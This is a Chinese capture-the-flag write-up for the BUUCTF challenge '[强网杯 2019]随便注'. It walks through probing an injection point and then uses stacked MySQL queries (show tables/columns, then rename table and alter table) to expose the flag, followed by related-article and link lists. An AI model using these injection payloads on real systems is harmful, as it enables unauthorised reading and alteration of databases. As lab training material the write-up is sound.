题目

打开环境发现是经典的提交界面

老规则还是查询注入点，1 or 1 =1#，1' order by 1#都未出错，但是1' union select 1,2#是出现了错误，发现一些查询语句被过滤了，那没办法了，只好去查查大佬的文章，发现需要使用堆叠查询

那就搞起，查数据库

0'; show databases; #

爆表，发现俩表

0'; show tables; #

爆表中的数据

0';show columns from words;#
0';show columns from `1919810931114514`;#

看见数字那个表里面有明显的flag，这里怎么也爆不出数据了只能看看大佬写的wp了，大佬是这么说的

那么查询语句很有可能是 : selsect id,data from words where id =

因为可以堆叠查询，这时候就想到了一个改名的方法，把words随便改成words1，然后把1919810931114514改成words，再把列名flag改成id，结合上面的1' or 1=1#爆出表所有内容就可以查flag啦

0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

我裂开了这谁能想到，这里谢谢大佬[强网杯 2019]随便注 1 - ZM思 - 博客园

BUUCTF [强网杯 2019]随便注相关推荐

1. buuctf [强网杯 2019]随便注 1

   buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看. 打开后是这样. 从题目和内容来看就是一道sql注入题. 输入 1' or 1=1;# 这个#用来注释掉后面 ...

2. BMZCTF 强网杯 2019 随便注 原理+题解

   目录 知识点 堆叠注入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开.而堆叠查询注入攻击就 ...

3. BUUCTF Web [强网杯 2019]随便注

   「作者主页」:士别三日wyx   此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...

4. 强网杯 2019]随便注 【SQL注入】四种解法

   题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...

5. [强网杯 2019]随便注 —— 堆叠注入

                          [强网杯 2019]随便注 前言        个人观点,若有误请指教 解题思路及步骤 直接上'引号,结果直接报错了,证明存在sql注入漏洞. 判断当前表 ...

6. [强网杯 2019]随便注 1

   题目[强网杯 2019]随便注 1 题目来源:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4% ...

7. 【BUUCTF】强网杯 2019随便注1 write up

   输入万能密码1' or 1=1# ,判断存在sql注入, SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台. 万能密码原理: 万能密码能够绕过sql检测,在 ...

8. 【BUUCTF】[强网杯 2019]随便注 1

   这是一个典型的sql注入题目 知识点: 1.注入点检测 2.万能匹配 3.暴力获得数据表和其属性 4.sql语句的掌握(order by; union select; rename table; al ...

9. （二）强网杯2019[随便注]

   堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句. 堆叠注入原理 在 ...

最新文章

1. 一套使用注入和Hook技术托管入口函数的方案
2. 数据结构 算法与应用C 语言描述第六章,数据结构算法与应用-C语言描述002.pdf
3. 程序员的幸福：上个月被裁拿赔偿，这个月找到涨薪50％的工作
4. 编写python程序输出图形_python 图形化编程---文本输入框
5. 社区奖品之DOULEX按键灯
6. 如何让某些用户对Marketing Cloud的contact数据只能实施只读操作
7. python字典和集合对象可以进行索引操作_Python中的字典跟集合整理笔记
8. 一个jeecg整合activiti的学习例子,源码下载
9. C# WinForm窗口最小化到系统托盘
10. C#编写的一个SFTP工具类
11. 线性共轭梯度法python_python实现共轭梯度法
12. 一分钟教会你烫了头发该怎么打理
13. 进阶级 - Git Hub 常用指南
14. mediawiki内嵌php,Mediawiki的模板
15. html5 tbody,tbody
16. 关于微信群、QQ群和其他发布平台
17. Axure RP Extension for Chrome的安装
18. 前端基础 HTML 第九章 使用框架结构 ----暑假学习第五天
19. 与思科交换机三层链路聚合连接 ❀ 飞塔 (Fortinet) 防火墙
20. C语言实现，输入某年某月某日，判断这一天是这一年的第几天？

热门文章

1. 原创 【我的OpenGL学习进阶之旅】介绍一下OpenGL ES的 遮挡查询
2. 电子科大 数据结构专题
3. mysql limit 丢数据_产品操作MySQL第6篇 – 数据过滤-LIMIT子句
4. SaltStack安装踩坑之路
5. SQL WHERE AND OR
6. 25000 字详解 23 种设计模式，原来可以这么简单！
7. 【sy3_类组合的应用与编程_3_Whole】
8. vb数据库编程（二）--数据控件
9. 猜灯谜、送福字 广西高速“返乡路”上年味浓
10. winows 10 下离线安装dapr